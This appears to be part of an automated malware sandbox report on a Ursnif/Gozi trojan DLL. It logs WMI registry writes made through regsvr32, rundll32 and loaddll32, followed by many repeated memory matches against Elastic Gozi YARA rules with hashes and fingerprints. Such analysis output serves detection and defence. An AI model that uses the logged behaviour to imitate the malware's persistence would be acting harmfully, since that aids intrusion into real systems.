                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: ursnif_IAT_corrected.exe.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                  Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
